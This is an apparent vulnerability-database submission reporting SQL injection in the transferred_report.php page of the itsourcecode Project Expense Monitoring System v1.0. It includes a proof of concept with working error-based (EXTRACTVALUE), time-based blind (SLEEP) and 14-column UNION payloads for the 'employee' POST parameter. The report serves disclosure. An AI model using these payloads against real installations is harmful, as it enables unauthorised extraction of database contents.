Submit #392948: itsourcecode Project Expense Monitoring System v1.0 SQLiinfo

Titleitsourcecode Project Expense Monitoring System v1.0 SQLi
DescriptionThere are multiple SQLi injection vulnerabilities in the transferred_report.php page. Attackers can pass special SQL statements in the "$_POST['start']", "$_POST['end']", and "$_POST['employee']" parameters to obtain sensitive data in the database. POC: Parameter: employee (POST) Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: employee=2' AND EXTRACTVALUE(8219,CONCAT(0x5c,0x7162627871,(SELECT (ELT(8219=8219,1))),0x717a627a71)) AND 'Priq'='Priq&search= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: employee=2' AND (SELECT 7024 FROM (SELECT(SLEEP(5)))kFSQ) AND 'IGyK'='IGyK&search= Type: UNION query Title: Generic UNION query (NULL) - 14 columns Payload: employee=2' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162627871,0x45716f47644d666d664649754b656c745a50746f714c474274445472556469537478474853514c69,0x717a627a71),NULL,NULL,NULL-- -&search=
Source⚠️ https://github.com/DeepMountains/zzz/blob/main/CVE3-4.md
User
 GUOTINGTING (ID 73614)
Submission08/17/2024 02:16 PM (2 months ago)
Moderation08/19/2024 04:12 PM (2 days later)
StatusAccepted
VulDB Entry275121
Points20

Want to stay up to date on a daily basis?

Enable the mail alert feature now!